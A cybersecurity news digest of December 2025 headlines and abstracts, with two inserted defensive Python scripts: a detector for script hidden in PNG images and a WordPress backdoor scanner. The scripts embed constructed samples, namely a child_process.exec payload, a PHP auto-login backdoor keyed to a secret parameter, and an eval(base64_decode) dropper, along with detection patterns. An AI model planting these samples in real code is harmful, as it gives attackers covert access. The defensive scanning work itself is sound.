December 2025
December 30, 2025 – Phishing
Fake Grubhub emails promise tenfold return on sent cryptocurrency
Abstract
Grubhub users received fraudulent messages, apparently sent from a company email address, promising a tenfold bitcoin payout in return for a transfer to a specified cryptocurrency wallet. (Bleeping Computer)
December 30, 2025 – APT
Evasive Panda cyberespionage campaign uses DNS poisoning to install MgBot backdoor
Abstract
Researchers spotted the China-linked APT group Evasive Panda (aka Daggerfly, Bronze Highland and StormBamboo) running a targeted cyber-espionage campaign that uses DNS poisoning to deliver the MgBot backdoor to victims in Türkiye, China and India. (Security Affairs)
December 30, 2025 – Breach
Korean Air discloses data breach after the hack of its catering and duty-free supplier
Abstract
Korean Air suffered a data breach after its in-flight catering supplier Korean Air Catering & Duty-Free (KC&D) was hacked, exposing personal data of about 30,000 Korean Air employees. (Security Affairs)
December 30, 2025 – Criminals
Hacker arrested for KMSAuto malware campaign with 2.8 million downloads
Abstract
A Lithuanian national has been arrested for allegedly infecting 2.8 million systems with clipboard-stealing malware disguised as KMSAuto, a tool for illegally activating Windows and Office. (Bleeping Computer)
December 30, 2025 – Breach
Two more banks notifying thousands of victims about Marquis Software ransomware attack
Abstract
Two U.S. banks have warned customers that they were affected by an August ransomware attack on Marquis Software. Artisans' Bank and VeraBank told Maine regulators last week that their recent data breaches trace back to that incident. (The Record)
December 30, 2025 – Hacker
Chinese state hackers use rootkit to hide ToneShell malware activity
Abstract
A new sample of the ToneShell backdoor, typically seen in Chinese cyberespionage campaigns, has been delivered through a kernel-mode loader in attacks against government organizations. (Bleeping Computer)
December 26, 2025 – Government
FCC Bans Foreign-Made Drones and Key Parts Over U.S. National Security Risks
Abstract
The FCC has announced a ban on foreign-made drones and critical components, citing national security risks. The decision is grounded in the 2025 National Defense Authorization Act (NDAA) and aims to protect U.S. airspace. (The Hacker News)
December 26, 2025 – Government
Japan Adopts New Cybersecurity Strategy to Counter Rising Cyber Threats
Abstract
Japan's new strategy identifies cyber operations linked to China, Russia and North Korea as significant threats. These attacks have targeted public institutions, private companies and essential services, and increasingly leverage technologies such as AI. (The Cyber Express)
December 26, 2025 – Phishing
Nomani Investment Scam Surges 62% Using AI Deepfake Ads on Social Media
Abstract
The Nomani investment scam has grown by 62%, using AI deepfake ads on social media platforms to deceive users. The report covers the scam's tactics, the improving quality of its AI-generated content, and the broader implications for ad fraud. (The Hacker News)
December 26, 2025 – Government
CISA Releases One Industrial Control Systems Advisory
Abstract
The advisory covers vulnerabilities in Mitsubishi Electric air conditioning systems that could allow unauthorized access to or control over the systems, leading to operational disruption and potential safety hazards. (CISA)
December 25, 2025 – General
NIST, MITRE announce $20 million research effort on AI cybersecurity
Abstract
NIST and The MITRE Corporation have announced a $20 million initiative to establish two research centers focused on artificial intelligence (AI) and its impact on cybersecurity for U.S. critical infrastructure. (CyberScoop)
December 25, 2025 – Malware
Webrat, disguised as exploits, is spreading via GitHub repositories
Abstract
The Webrat malware campaign targets inexperienced security professionals and students by posing as exploits for high-profile vulnerabilities; the lures are named after flaws with high CVSSv3 scores. (Securelist)
December 25, 2025 – Criminals
Chinese Crypto Scammers on Telegram Are Fueling the Biggest Darknet Markets Ever
Abstract
The Chinese-speaking crypto scam markets on Telegram, specifically Tudou Guarantee and Xinbi Guarantee, have become the largest darknet markets in history, facilitating nearly $2 billion in monthly transactions. (Wired)
December 25, 2025 – Vulnerabilities
React2Shell Explained (CVE-2025-55182): From Vulnerability Discovery to Exploitation
Abstract
React2Shell is a critical RCE vulnerability affecting React Server Components and the React Flight protocol. It allows unauthenticated attackers to execute arbitrary code on vulnerable servers with a single crafted HTTP request. (Resecurity)
December 25, 2025 – Privacy
Inside Uzbekistan's nationwide license plate surveillance system
Abstract
Uzbekistan's nationwide license plate surveillance system was exposed to the internet without a password. The lapse revealed the real-time locations of surveillance cameras and millions of photos and videos of vehicles. (TechCrunch)
December 25, 2025 – Vulnerabilities
MongoDB warns admins to patch severe RCE flaw immediately
Abstract
MongoDB has issued an urgent advisory for administrators to patch a critical remote code execution (RCE) vulnerability, CVE-2025-14847, affecting multiple versions of MongoDB Server. (Bleeping Computer)
December 24, 2025 – Government
U.S. CISA adds a flaw in Digiever DS-2105 Pro to its Known Exploited Vulnerabilities catalog
Abstract
CISA has added a critical vulnerability in the Digiever DS-2105 Pro network video recorder, tracked as CVE-2023-52163 (CVSS 8.8), to its Known Exploited Vulnerabilities catalog. (Security Affairs)
December 24, 2025 – Breach
South Korea's Shinhan Card Data Breach Affects 192,000 Merchants
Abstract
The Shinhan Card data breach exposed the personal information of approximately 192,000 card merchants. The incident highlights the risk posed by insider misconduct within financial institutions. (The Cyber Express)
December 24, 2025 – Criminals
U.S. DoJ Seizes Fraud Domain Behind $14.6 Million Bank Account Takeover Scheme
Abstract
The U.S. Department of Justice has seized the domain web3adspanels[.]org, used in a bank account takeover scheme that caused $14.6 million in losses. Visitors to the domain now see a seizure banner. (The Hacker News)
December 23, 2025 – Criminals
FBI Seizes Fake ID Template Domains Operating from Bangladesh
Abstract
The FBI has dismantled an online marketplace, known as TechTreek, operated by Zahid Hasan from Bangladesh, which sold digital templates for fraudulent identification documents. (Hack News)
December 23, 2025 – Vulnerabilities
New Flaw in Somalia's E-Visa System Exposes Travelers' Passport Data
Abstract
A critical security flaw in Somalia's e-visa system exposes sensitive personal data of travelers, allowing unauthorized access to passport details, full names and birth dates. (The Cyber Express)
December 23, 2025 – Breach
1,000 systems pwned in Romanian Waters ransomware attack
Abstract
A ransomware attack compromised approximately 1,000 systems within Romania's water management administration, Romanian Waters. The attack began on December 20 and spread to ten of the country's 11 river basin management organizations. (The Register)
December 23, 2025 – Breach
University of Phoenix data breach impacts nearly 3.5 million individuals
Abstract
The University of Phoenix (UoPX) suffered a data breach affecting 3,489,274 individuals, including students, staff and suppliers. The breach was disclosed on the university's official website in early December. (Bleeping Computer)
December 23, 2025 – Hacker
Hackers Abuse Popular Monitoring Tool Nezha as a Stealth Trojan
Abstract
Attackers are abusing the legitimate Nezha monitoring tool as a stealth remote-access trojan. The deployment scripts contain Simplified Chinese messages and the command-and-control server is hosted on Alibaba Cloud infrastructure in Japan. (Hackread)
December 23, 2025 – Malware
Malicious npm package steals WhatsApp accounts and messages
Abstract
A malicious npm package named lotusbail has been identified posing as a legitimate WhatsApp Web API library. The package is a fork of the WhiskeySockets Baileys project and has been downloaded over 56,000 times. (Bleeping Computer)
December 23, 2025 – Breach
Florida dermatologist warns 55,000+ people of data breach that compromised SSNs, medical info
Abstract
Brevard Skin and Cancer Center has notified over 55,000 individuals of a data breach that compromised sensitive personal information, including names, SSNs, billing and claims information, diagnoses and clinical information. (Comparitech)
December 22, 2025 – Malware
TikTok's "Scam-Yourself" Trap: How AuraStealer Malware Tricks Users into Hacking Their Own PCs
Abstract
A deep-dive analysis by Gen Digital (Gen Threat Labs) examines AuraStealer, an emerging malware-as-a-service (MaaS) gaining traction in underground forums through a "Scam-Yourself" distribution tactic, in which victims are talked into running the infection steps themselves. (Security Online)
December 22, 2025 – Ransomware
"ClickFix" Trap: Fake Human Verification Leads to Qilin Ransomware Infection
Abstract
The "ClickFix" social engineering tactic has become a gateway for major ransomware attacks: researchers have found a direct link between these fake human-verification prompts and the Qilin ransomware group. (Security Online)
December 22, 2025 – General
Senior U.S. Officials Continue to be Impersonated in Malicious Messaging Campaign
Abstract
Activity dating back to 2023 shows malicious actors impersonating senior U.S. state government, White House and Cabinet-level officials, as well as members of Congress, to target individuals. (IC3)
December 22, 2025 – Government
CISA and Partners Release Update to Malware Analysis Report BRICKSTORM Backdoor
Abstract
CISA, the National Security Agency and the Canadian Centre for Cyber Security have released an update to the BRICKSTORM Backdoor Malware Analysis Report with indicators of compromise (IOCs) and detection signatures for additional BRICKSTORM samples. (CISA)
December 22, 2025 – Law Article
Nefilim Ransomware Affiliate Pleads Guilty
Abstract
Artem Aleksandrovych Stryzhak, 35, was extradited from Barcelona, Spain earlier this year after his arrest in June 2024. He pleaded guilty to one count of conspiracy to commit computer fraud, according to the U.S. Justice Department. (Infosecurity Magazine)
December 19, 2025 – Attack
GachiLoader: Defeating Node.js Malware with API Tracing
Abstract
A malware distribution campaign leverages the YouTube Ghost Network to deploy GachiLoader, a heavily obfuscated Node.js-based loader that delivers the Rhadamanthys infostealer. (Check Point)
December 19, 2025 – Attack
Clop ransomware targets Gladinet CentreStack in data theft attacks
Abstract
The Clop ransomware gang is targeting Gladinet CentreStack file servers in a new data theft extortion campaign, scanning for and breaching Internet-exposed CentreStack servers. (Bleeping Computer)
December 19, 2025 – Vulnerabilities
Windows 10 OOB update released to fix Message Queuing (MSMQ) issues
Abstract
Microsoft has released an out-of-band (OOB) update, KB5074976, to address problems with Message Queuing (MSMQ) on Windows 10 that arose after the December 9, 2025 update. (Bleeping Computer)
December 19, 2025 – Phishing
Inside a purchase order PDF phishing campaign
Abstract
A phishing campaign uses weaponized PDF documents to steal corporate credentials. The phishing emails carry a PDF attachment named "NEW Purchase Order # 52177236.pdf". (Malwarebytes)
December 19, 2025 – Criminals
DIG AI: Uncensored Darknet AI Assistant at the Service of Criminals and Terrorists
Abstract
The emergence of DIG AI, an uncensored darknet AI assistant, is a significant threat; mentions and use of malicious AI tools rose by more than 200% from 2024 to 2025. (Resecurity)
December 19, 2025 – APT
Group Policy abuse reveals China-aligned espionage group targeting governments
Abstract
A China-aligned advanced persistent threat group, LongNosedGoblin, is targeting government institutions in Southeast Asia and Japan. The group abuses Windows Group Policy to deploy malware and conduct long-term surveillance. (Help Net Security)
December 19, 2025 – Criminals
Amazon blocked 1,800 suspected DPRK job applicants
Abstract
Amazon has blocked over 1,800 suspected North Korean applicants from securing remote jobs since April 2024. The applicants use fake identities, AI tools and deepfakes, funneling their wages to the North Korean regime. (The Register)
December 18, 2025 – General
November 2025 Trends Report on Phishing Emails
Abstract
This report provides an overview of phishing email trends observed in November 2025, highlighting the tactics, techniques and procedures (TTPs) employed by threat actors. (AhnLab)
December 18, 2025 – Botnet
Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks
Abstract
The Kimwolf botnet has hijacked 1.8 million Android-based devices, including TVs, set-top boxes and tablets, to conduct large-scale DDoS attacks. The botnet is linked to the AISURU botnet. (The Hacker News)
December 18, 2025 – Hacker
Ink Dragon's Relay Network and Stealthy Offensive Operation
Abstract
Ink Dragon, a sophisticated Chinese threat actor, is using a custom ShadowPad IIS Listener module to turn compromised servers into distributed relay nodes. (Check Point)
December 18, 2025 – Malware
New spyware discovered on Belarusian journalist's phone after interrogation
Abstract
A new spyware, dubbed ResidentBat, has been found on a Belarusian journalist's phone. It targets Android devices and can access call logs, SMS, encrypted app messages, microphone recordings, locally stored files and screen captures. (The Record)
December 18, 2025 – Breach
Richmond, VA mental health service notifies 113,000+ people of data breach
Abstract
The Richmond Behavioral Health Authority in Virginia suffered a data breach affecting 113,232 individuals. The compromised data includes names, SSNs, passport numbers, financial account information and protected health information. (Comparitech)
December 18, 2025 – Vulnerabilities
Exploited SonicWall zero-day patched (CVE-2025-40602)
Abstract
SonicWall has patched a critical vulnerability in its Secure Mobile Access (SMA) 1000 appliances. Chained with CVE-2025-23006, it allows attackers to achieve unauthenticated remote code execution with root privileges. (Help Net Security)
December 18, 2025 – Government
CISA Adds Three Known Exploited Vulnerabilities to Catalog
Abstract
CISA has added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog based on evidence of active exploitation. These vulnerabilities pose significant risks to federal enterprises and require immediate attention. (CISA)
December 18, 2025 – Government
CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation
Abstract
A critical vulnerability in ASUS Live Update, tracked as CVE-2025-59374 (CVSS 9.3), has been actively exploited. The flaw, stemming from a supply chain compromise, allows attackers to perform unintended actions on affected devices. (The Hacker News)
December 17, 2025 – Vulnerabilities
Multiple Vulnerabilities in Apple Products Could Allow for Arbitrary Code Execution
Abstract
Multiple vulnerabilities have been identified in Apple products, the most severe of which could allow arbitrary code execution. Apple is aware of reports that CVE-2025-43529 and CVE-2025-14174 may have been exploited in sophisticated attacks. (Ci Security)
December 17, 2025 – Cryptocurrency
Compromised IAM Credentials Power a Large AWS Crypto Mining Campaign
Abstract
A cryptocurrency mining campaign is targeting AWS customers. The attackers use compromised IAM credentials to deploy crypto miners and rely on persistence techniques to evade detection and keep operating. (The Hacker News)
December 17, 2025 – Vulnerabilities
Photo booth flaw exposes people's private pictures online
Abstract
A vulnerability in a photo booth company's website exposed users' private photos, creating significant privacy risk. The flaw allowed unauthorized access to photos and videos. (Malwarebytes)
December 17, 2025 – Breach
Russia-linked hackers breach critical infrastructure organizations via edge devices
Abstract
The threat actor has shifted from exploiting zero-day vulnerabilities to targeting known but unpatched (n-day) flaws in edge devices. The approach reduces its workload and chances of detection while delivering the same operational outcomes. (Cybersecurity Dive)
December 17, 2025 – Vulnerabilities
Vulnerability in Mitsubishi Electric GT Designer3 Allows Unauthorized Device Operation
Abstract
A vulnerability in Mitsubishi Electric GT Designer3 allows attackers to obtain plaintext credentials, potentially enabling unauthorized operation of GOT2000 and GOT1000 series devices. (CISA)
December 17, 2025 – Vulnerabilities
Critical Vulnerability in Hitachi Energy AFS, AFR, and AFF Series
Abstract
A critical vulnerability, CVE-2024-3596, affects Hitachi Energy's AFS, AFR and AFF series. It can compromise data integrity and disrupt availability, posing significant risk to critical infrastructure sectors. (CISA)
December 17, 2025 – Government
CISA Alerts on Apple WebKit Zero-Day Actively Exploited
Abstract
CISA has flagged a critical zero-day vulnerability, CVE-2025-43529, in Apple's WebKit rendering engine. It is actively exploited in the wild and affects millions of users across iOS, iPadOS, macOS and other Apple platforms. (CISA)
December 17, 2025 – Malware
Cellik Android malware builds malicious versions from Google Play apps
Abstract
Cellik is a newly discovered Android malware-as-a-service (MaaS) that lets cybercriminals create malicious versions of apps from the Google Play Store. It is offered for $150 per month or $900 for lifetime access. (Bleeping Computer)
December 17, 2025 – Phishing
BlindEagle Deploys Caminho and DCRAT
Abstract
BlindEagle, a threat actor operating in South America, has launched a spear-phishing campaign against a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT). (Zscaler)
December 17, 2025 – Attack
GhostPoster attacks hide malicious JavaScript in Firefox addon logos
Abstract
The "GhostPoster" campaign abuses Firefox extensions by embedding malicious JavaScript in their image logos using steganography. The technique lets attackers monitor browser activity and plant a backdoor, affecting over 50,000 users. (Bleeping Computer)
December 15, 2025 – Breach
Data breach at credit check giant 700Credit affects at least 5.6 million
Abstract
Credit-check provider 700Credit has disclosed a data breach affecting at least 5.6 million people. (TechCrunch)
December 15, 2025 – Vulnerabilities
CISA adds Google Chromium out-of-bounds flaw CVE-2025-14174 to the Known Exploited Vulnerabilities Catalog
Abstract
A critical out-of-bounds memory access vulnerability in Google Chromium, tracked as CVE-2025-14174, could allow remote attackers to perform unauthorized memory access via a crafted HTML page. (CISA)
December 15, 2025 – Breach
Fieldtex notifies 274,000 people of data breach, ransomware gang takes credit
Abstract
Fieldtex, a New York-based manufacturer, has notified 247,363 individuals of a data breach that occurred in August 2025. The breach, claimed by the Akira ransomware group, involved the theft of personal information. (Comparitech)
December 15, 2025 – Malware
New PyStoreRAT Malware Targets OSINT Researchers Through GitHub
Abstract
PyStoreRAT is a newly identified malware targeting OSINT researchers and IT professionals through GitHub. It is distributed via fake OSINT tools and other software, leveraging AI to build trust and evade detection. (Hackread)
December 15, 2025 – Outage
More than 340,000 impacted by cyberattack on library in large Washington county
Abstract
A cyberattack on the Pierce County Library System in Washington exposed the personal information of over 340,000 individuals. The breach, attributed to the INC ransomware gang, forced the library system to shut down all of its systems. (The Record)
December 15, 2025 – Vulnerabilities
Apple fixes two zero-day flaws exploited in 'sophisticated' attacks
Abstract
Apple has released emergency updates to address two zero-day vulnerabilities, CVE-2025-43529 and CVE-2025-14174, which were exploited in sophisticated attacks targeting specific individuals. (Bleeping Computer)
December 15, 2025 – Government
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity vulnerability, CVE-2018-4063, affecting Sierra Wireless AirLink ALEOS routers, to its Known Exploited Vulnerabilities catalog. (The Hacker News)
December 15, 2025 – Breach
Experts found an unsecured 16TB database containing 4.3B professional records
Abstract
An unsecured 16 TB MongoDB database containing 4.3 billion professional records was discovered. The LinkedIn-style data it holds poses a significant risk of large-scale AI-driven social engineering. (Security Affairs)
December 12, 2025 – Vulnerabilities
Notepad++ fixes flaw that let attackers push malicious update files
Abstract
Notepad++ has fixed a critical bug in its WinGUp update tool that allowed attackers to push malicious update files. The flaw was exploited to execute unauthorized commands and exfiltrate sensitive data. (Bleeping Computer)
December 12, 2025 – Phishing
Doxers Posing as Cops Are Tricking Big Tech Firms Into Sharing People's Private Data
Abstract
Hackers are exploiting weaknesses in the emergency data request (EDR) process by impersonating law enforcement officers to obtain private user data from major tech companies. (Wired)
December 11, 2025 – Malware
Cracking ValleyRAT: From Builder Secrets to Kernel Rootkits
Abstract
The ValleyRAT backdoor, also known as Winos/Winos4.0, has been dissected to reveal its modular architecture and advanced capabilities. The backdoor is associated with Chinese-speaking threat actors. (Check Point)
December 11, 2025 – Malware
VS Code extensions contain trojan-laden fake image
Abstract
A campaign of 19 malicious VS Code extensions carries malware disguised as a PNG file. The extensions abuse the "path-is-absolute" npm package to execute malicious activity on developers' machines. (ReversingLabs)
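The GhostPoster entry above (JavaScript hidden in extension logos) and this VS Code campaign both rely on a file that looks like an image but carries code. The following Python is an added example, not code from either report or from ReversingLabs or Bleeping Computer: it validates the PNG chunk structure (including CRCs), flags bytes appended after the IEND chunk, and looks for script-like text inside PNG text chunks or in a file that is not a PNG at all. The sample images, the payload string and the script-marker regex are constructed assumptions, not published indicators.

```python
"""Added example (not code from the GhostPoster or VS Code extension reports):
flag image files that are not really PNGs, carry data after the IEND chunk,
or hide script-like text in PNG text chunks. All samples below are constructed."""
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = ("tEXt", "zTXt", "iTXt")
# Loose markers for embedded JavaScript/PHP (assumption, not a published signature).
SCRIPT_MARKERS = re.compile(
    rb"(?:<\?php|<script|\beval\s*\(|\bnew\s+Function\b|\bfunction\s*\(|\brequire\s*\(|\b(?:chrome|browser)\.runtime\b)",
    re.I,
)
# Constructed payload used by the samples: a Node-style one-liner.
PAYLOAD = b"(function(){require('child_process').exec('whoami')})();"


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_png(extra_chunks=()) -> bytes:
    """Build a minimal 1x1 RGB PNG (constructed sample), with optional chunks before IDAT."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter byte 0 + one red pixel
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + b"".join(extra_chunks)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def parse_png_chunks(data: bytes):
    """Walk the chunk list, verifying CRCs. Returns (chunks, offset just past IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("bad PNG signature")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", data, pos + 8 + length)
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r} at offset {pos}")
        chunks.append((ctype.decode("latin-1"), body))
        pos = end
        if ctype == b"IEND":
            return chunks, pos
    raise ValueError("no IEND chunk")


def text_payload(ctype: str, body: bytes) -> bytes:
    """Return the text part of a tEXt/zTXt/iTXt chunk (zTXt is inflated after the keyword and method byte)."""
    if ctype == "zTXt":
        _, _, rest = body.partition(b"\x00")  # keyword, then 1-byte compression method, then zlib data
        try:
            return zlib.decompress(rest[1:])
        except zlib.error:
            return rest
    return body


def inspect_image(data: bytes) -> dict:
    """Report why a supposed PNG deserves a closer look."""
    report = {"valid_png": False, "trailing_bytes": 0, "findings": []}
    try:
        chunks, end = parse_png_chunks(data)
    except ValueError as exc:
        report["findings"].append(f"not a well-formed PNG: {exc}")
        if SCRIPT_MARKERS.search(data):
            report["findings"].append("script-like content in a file with an image extension")
        return report
    report["valid_png"] = True
    trailer = data[end:]
    report["trailing_bytes"] = len(trailer)
    if trailer:
        kind = "script-like" if SCRIPT_MARKERS.search(trailer) else "opaque"
        report["findings"].append(f"{len(trailer)} {kind} bytes appended after IEND")
    for ctype, body in chunks:
        if ctype in TEXT_CHUNKS and SCRIPT_MARKERS.search(text_payload(ctype, body)):
            report["findings"].append(f"script-like content in {ctype} chunk")
    return report


def sample_images() -> dict:
    """Constructed samples: one clean PNG and three that should be flagged."""
    return {
        "clean.png": make_png(),
        "appended.png": make_png() + PAYLOAD,
        "ztxt.png": make_png([png_chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(PAYLOAD))]),
        "fake.png": b"var f = new Function(atob('...')); f();",
    }


if __name__ == "__main__":
    for name, blob in sample_images().items():
        print(name, inspect_image(blob))
```

Run it over every image shipped inside an extension package (after unzipping the .xpi or .vsix) and treat any finding as a reason to read the extension's JavaScript for the code that loads and decodes the image.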
December 11, 2025 – Vulnerabilities
.NET SOAPwn Flaw Opens Door for File Writes and Remote Code Execution via Rogue WSDL
Abstract
A critical vulnerability known as "SOAPwn" in the .NET Framework lets attackers achieve remote code execution by abusing WSDL imports and HTTP client proxies. (The Hacker News)
December 11, 2025 – Breach
700+ self-hosted Git instances battered in 0-day attacks
Abstract
A zero-day bug in Gogs, a self-hosted Git service, is being actively exploited. The vulnerability, CVE-2025-8110, affects Gogs servers with open registration enabled. Over 700 instances have been compromised, out of 1,400 exposed to the internet. (The Register)
December 11, 2025 – Breach
Ransomware gang says it hacked Kansas broadband provider Rainbow Communications
Abstract
Rainbow Communications, a broadband provider in Kansas, suffered a ransomware attack by the Inc group, causing service disruptions from November 16 to November 19, 2025. Inc claims to have stolen 200 GB of data. (Comparitech)
December 11, 2025 – Malware
New DroidLock malware locks Android devices and demands a ransom
Abstract
DroidLock is a newly discovered Android malware that locks devices and demands a ransom. It targets Spanish-speaking users and is distributed through malicious websites promoting fake applications. (Bleeping Computer)
December 11, 2025
ClickFix Social Engineering Sparks Rise of CastleLoader Attacks
Abstract
A malware campaign uses ClickFix social engineering to deploy the CastleLoader malware family. The campaign employs a Python-based delivery chain, replacing the earlier AutoIt droppers with a compact Python loader. (Infosecurity Magazine)
December 11, 2025 – Breach
Petco takes down Vetco website after exposing customers' personal information
Abstract
Petco's Vetco Clinics website exposed sensitive customer and pet information, marking the company's third data breach in 2025. (TechCrunch)
December 11, 2025 – Malware
WordPress Auto-Login Backdoor Disguised as JavaScript Data File
Abstract
A WordPress backdoor disguised as a JavaScript data file lets attackers log into administrator accounts without credentials. The malware is hidden in a PHP file within the WordPress wp-admin/js directory. (Sucuri)
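A quick way to look for this class of backdoor on a site you administer, as an added example (not Sucuri's code): walk the install and flag PHP opening tags in non-.php files, PHP files under directories that core populates only with JavaScript, session-minting calls (wp_set_auth_cookie, wp_set_current_user, wp_signon) in a file that also reads request input, and eval over a decoded blob. The mini-site it scans is constructed; the JavaScript-only directory list and the hypothetical secret-parameter backdoor are assumptions, not indicators from the Sucuri write-up.

```python
"""Added example, not Sucuri's code: walk a WordPress install and flag files that
behave like the auto-login backdoor described above. The sample site is constructed."""
import re
import tempfile
from pathlib import Path

PHP_OPEN = re.compile(rb"<\?(?:php\b|=)", re.I)
# Core functions that mint a logged-in session; legitimate callers outside login flows are rare.
AUTH_CALLS = re.compile(rb"\b(?:wp_set_auth_cookie|wp_set_current_user|wp_signon)\s*\(")
REQUEST_INPUT = re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")
OBFUSCATED_EVAL = re.compile(
    rb"\b(?:eval|assert|create_function)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
    re.I,
)
# Assumption: core ships only JavaScript under these paths, so a PHP file there is foreign.
JS_ONLY_DIRS = ("wp-admin/js/", "wp-includes/js/")


def scan_wordpress_tree(root) -> list:
    """Return sorted [(relative_path, [reasons...])] for files worth a closer look."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        is_php = path.suffix.lower() == ".php"
        reasons = []
        if not is_php and PHP_OPEN.search(data):
            reasons.append("PHP opening tag in a non-PHP file")
        if is_php and any(rel.startswith(d) for d in JS_ONLY_DIRS):
            reasons.append("PHP file in a JavaScript-only core directory")
        if AUTH_CALLS.search(data) and REQUEST_INPUT.search(data):
            reasons.append("session/auth call in a file that also reads request input")
        if OBFUSCATED_EVAL.search(data):
            reasons.append("eval over a decoded payload")
        if reasons:
            findings.append((rel, reasons))
    return sorted(findings)


def build_sample_site(base=None) -> Path:
    """Write a constructed mini-install: two benign files and two planted backdoors."""
    base = Path(base) if base else Path(tempfile.mkdtemp())
    files = {
        "wp-admin/js/common.js": b"jQuery(function($){ $('#adminmenu').show(); });",
        "wp-content/themes/demo/functions.php":
            b"<?php add_action('init', function () { register_nav_menu('main', 'Main'); });",
        # Planted backdoor 1 (hypothetical): logs the visitor in as user ID 1 when a secret parameter is present.
        "wp-admin/js/data.php":
            b"<?php if (isset($_GET['k']) && $_GET['k'] === 'x') { wp_set_current_user(1); "
            b"wp_set_auth_cookie(1); header('Location: /wp-admin/'); }",
        # Planted backdoor 2: classic obfuscated dropper in the uploads tree.
        "wp-content/uploads/2025/cache.php": b"<?php eval(base64_decode('ZWNobyAxOw=='));",
    }
    for rel, body in files.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)
    return base


if __name__ == "__main__":
    site = build_sample_site()
    for rel, reasons in scan_wordpress_tree(site):
        print(rel, "->", "; ".join(reasons))
```

Point scan_wordpress_tree at the document root of a real install; anything it flags under wp-admin or wp-includes should be diffed against a clean copy of the same core version before it is deleted, since the file's contents, not its name, are what matter.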
December 11, 2025 – Education
Browser Hijacking: Three Technique Studies
Abstract
This article examines three browser hijacking techniques: manipulating browser preference files, using a Browser Remote Access Tool (BRAT), and abusing registry entries and scheduled tasks. (G DATA Software)
December 9, 2025 – Government
FBI: Crooks manipulate online photos to fuel virtual kidnapping ransoms
Abstract
The FBI has warned of a scam in which criminals manipulate online photos to create fake "proof-of-life" images for virtual kidnapping schemes, posing as kidnappers and demanding ransom on the strength of the altered images. (Security Affairs)
December 9, 2025 – Criminals
European cops arrest 193 'violence-as-a-service' suspects
Abstract
Europol's Operational Taskforce GRIMM has dismantled a significant "violence-as-a-service" network, resulting in the arrest of 193 individuals. The operation involved law enforcement agencies from multiple European countries. (The Register)
December 9, 2025 – General
Researchers spot 700 percent increase in hypervisor attacks
Abstract
Researchers have observed a 700% increase in ransomware attacks targeting hypervisors, with their share of malicious encryption rising from 3% in the first half of the year to 25% in the second half. (The Register)
December 9, 2025 – General
Initial access brokers involved in more attacks, including on critical infrastructure
Abstract
Initial access brokers (IABs) have become pivotal in the cybercrime ecosystem, letting advanced adversaries outsource the intrusion stage. This commoditization of access to critical systems allows IABs to sell access to the highest bidder. (Cybersecurity Dive)
December 9, 2025 – Phishing
Scammers harvesting Facebook photos to stage fake kidnappings, warns FBI
Abstract
The FBI has warned of a scam in which criminals harvest photos from social media platforms such as Facebook, LinkedIn and X to stage fake kidnappings, using the photos as "proof-of-life" to extort ransom from the victim's family. (Malwarebytes)
December 9, 2025 – General
UK intelligence warns AI 'prompt injection' attacks might never go away
Abstract
The UK's National Cyber Security Centre (NCSC) has warned that "prompt injection" attacks on AI systems are a persistent threat. These attacks manipulate AI models into carrying out unintended actions, posing a significant security risk. (The Record)
December 9, 2025 – Vulnerabilities
Three hacking groups, two vulnerabilities and all eyes on China
Abstract
The ToolShell campaign exposed critical vulnerabilities in Microsoft SharePoint, exploited by three Chinese hacking groups: Linen Typhoon, Violet Typhoon and Storm-2603. (The Record)
December 9, 2025 – Breach
Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT
Abstract
The JS#SMUGGLER campaign uses compromised websites to deploy the NetSupport RAT, which gives attackers full control over victim systems. The multi-stage, web-based operation targets enterprise users. (The Hacker News)
December 9, 2025 – Malware
ChrimeraWire Trojan Fakes Chrome Activity to Manipulate Search Rankings
Abstract
The ChrimeraWire trojan manipulates search engine rankings by simulating user activity through Chrome. Unlike typical malware, it aims to boost the visibility of specific websites in search results rather than steal data or encrypt files. (Hackread)
December 9, 2025 – Malware
Malicious VSCode extensions on Microsoft's registry drop infostealers
Abstract
Two malicious VSCode extensions, Bitcoin Black and Codo AI, have been found on Microsoft's extension registry. Published under the developer name "BigBlack", they infect developers' machines with information-stealing malware. (Bleeping Computer)
December 5, 2025 – Malware
Researchers find Predator spyware is being used in several countries, including Iraq Full Text
Abstract
Predator spyware, developed by Intellexa, is actively being used in several countries, including Iraq and Pakistan. Researchers have found indicators likely associated with the use of Predator spyware by an entity tied to Pakistan.The Record
December 5, 2025 – Vulnerabilities
Update Chrome now: Google fixes 13 security issues affecting billions Full Text
Abstract
Google has released an update for its Chrome browser, addressing 13 security vulnerabilities, including four high-severity issues. One critical vulnerability, CVE-2025-13633, affects the Digital Credentials feature.Malware Bytes
December 5, 2025 – Attack
